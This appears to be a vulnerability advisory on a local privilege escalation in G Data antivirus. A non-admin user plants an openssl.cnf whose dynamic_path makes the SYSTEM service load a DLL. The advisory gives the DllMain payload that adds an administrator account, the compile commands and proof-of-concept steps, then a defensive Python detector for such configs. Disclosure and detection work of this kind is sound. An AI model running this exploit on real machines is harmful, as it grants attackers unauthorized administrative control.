


G Data Antivirus issues .dll

The underlying problem is that the GdAgentSrv service (which runs as SYSTEM) tries to load its OpenSSL configuration from the non-existing path C:\Jenkins\vcpkg-master\packages\openssl-windows_x86-141-static\openssl.cnf (newer versions load from C:\Jenkins\vcpkg-master\packages\openssl-windows_x86-static\openssl.cnf).

Luckily for us, we can abuse OpenSSL's extensibility to not only load TPM engines, but also to inject malicious code into the GdAgentSrv process. To do that we create the previously identified openssl.cnf file at the given path and abuse the dynamic_path option to specify a DLL of our choosing. Normal end-user permissions are sufficient for these actions.

In this example we use the DllMain entry point to create a new administrative user attacker as soon as the DLL is loaded:

```cpp
system("net user attacker Batman42 /add");
system("net localgroup Administrators attacker /add");
```

The DLL is built with the Visual Studio command-line tools:

```
"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" amd64
cl.exe /D_USRDLL /D_WINDLL dll.cpp /link /DLL /OUT:bad_dll.dll
```

After the system is rebooted (or the GdAgentSrv process is restarted) the config file is parsed and the DLL loaded. This in turn causes the new administrator to be added to the system.

Proof of Concept

To confirm this issue yourself, install the G Data Security Client 14.2.1.6 and download the precompiled version of the exploit files. After that, as a non-admin user, create the folder C:\Jenkins\vcpkg-master\packages\openssl-windows_x86-141-static\ and place the previously downloaded files (openssl.cnf, bad_dll.dll) therein. During the boot process, the new admin user attacker will be added.

Fix

Starting from the vulnerability is fixed. Update to the latest available version – which happens automatically anyway.

Timeline

The issue has been identified, documented and reported (ticket number CAS-730826-F7K4R9).
After initial communication no further feedback.
11.2020: The issue was communicated again to G Data's Sales Team in Austria.
06.2021: The issue was abused during a security check to take over another client's infrastructure. Full access to the affected endpoint has been gained.
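From a defender's side, the condition described above comes down to one question: does any OpenSSL configuration the agent might pick up declare a dynamic engine, and does that engine's DLL sit somewhere an unprivileged user can write? The script below is an added example written for this page; it is not code from the original post or from G Data. The configuration text is constructed to mirror the kind of file the write-up describes, and the list of directory prefixes treated as administrator-controlled is an assumption for illustration.

```python
"""Added example: flag OpenSSL config files that load a DLL through an engine's dynamic_path.

Not code from the original post or from G Data. The config text below is
constructed to mirror the file described in the write-up, and TRUSTED_PREFIXES
is an assumption used to decide whether a DLL location is administrator-controlled.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: a config that makes OpenSSL load an engine DLL from a path
# an unprivileged user could have created.
SAMPLE_CNF = """\
openssl_conf = openssl_init

[openssl_init]
engines = engine_section

[engine_section]
tpm = tpm_section

[tpm_section]
engine_id = tpm
dynamic_path = C:\\Jenkins\\vcpkg-master\\packages\\openssl-windows_x86-141-static\\bad_dll.dll
init = 1
"""

# Constructed sample: a config with no engine section at all.
BENIGN_CNF = """\
[req]
default_bits = 2048
"""

# Assumption: DLLs below these prefixes were installed by an administrator;
# anything elsewhere is reported as suspicious.
TRUSTED_PREFIXES = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


def parse_cnf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-like OpenSSL config format into {section: {key: value}}.

    Keys before the first [section] header belong to the "default" section,
    which is where OpenSSL looks for the top-level openssl_conf pointer.
    """
    sections: Dict[str, Dict[str, str]] = {"default": {}}
    current = "default"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        if not line:
            continue
        header = re.fullmatch(r"\[\s*([^\]]+?)\s*\]", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, {})
            continue
        if "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            sections[current][key] = value
    return sections


def find_dynamic_engines(sections: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """Follow openssl_conf -> engines -> engine sections; return (engine name, dynamic_path) pairs."""
    init_name = sections["default"].get("openssl_conf")
    if init_name is None:
        return []
    engines_name = sections.get(init_name, {}).get("engines")
    if engines_name is None:
        return []
    found: List[Tuple[str, str]] = []
    for engine_name, engine_section in sections.get(engines_name, {}).items():
        entry = sections.get(engine_section, {})
        if "dynamic_path" in entry:
            found.append((engine_name, entry["dynamic_path"]))
    return found


def is_trusted_path(path: str) -> bool:
    """Heuristic (assumption): is the DLL under a directory only administrators can write to?"""
    normalised = path.strip('"').lower().replace("/", "\\")
    return normalised.startswith(TRUSTED_PREFIXES)


def audit_cnf(text: str) -> List[dict]:
    """One finding per engine DLL the config would load, marking untrusted locations."""
    return [
        {"engine": name, "dynamic_path": dll, "trusted_location": is_trusted_path(dll)}
        for name, dll in find_dynamic_engines(parse_cnf(text))
    ]


if __name__ == "__main__":
    for label, cnf in (("sample", SAMPLE_CNF), ("benign", BENIGN_CNF)):
        findings = audit_cnf(cnf)
        if not findings:
            print(f"{label}: no dynamic engines declared")
        for f in findings:
            verdict = "ok" if f["trusted_location"] else "SUSPICIOUS"
            print(f"{label}: engine {f['engine']} loads {f['dynamic_path']} [{verdict}]")
```

On a real endpoint you would read the two candidate paths named above (if they exist at all) and pass their contents to audit_cnf; a finding whose dynamic_path lies outside administrator-controlled directories, or a config file that exists at all under a location a standard user could create, is the signal worth alerting on. The same check is what a hardened service should perform itself: refuse to parse a configuration file from a directory that is absent at install time or writable by non-administrators.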
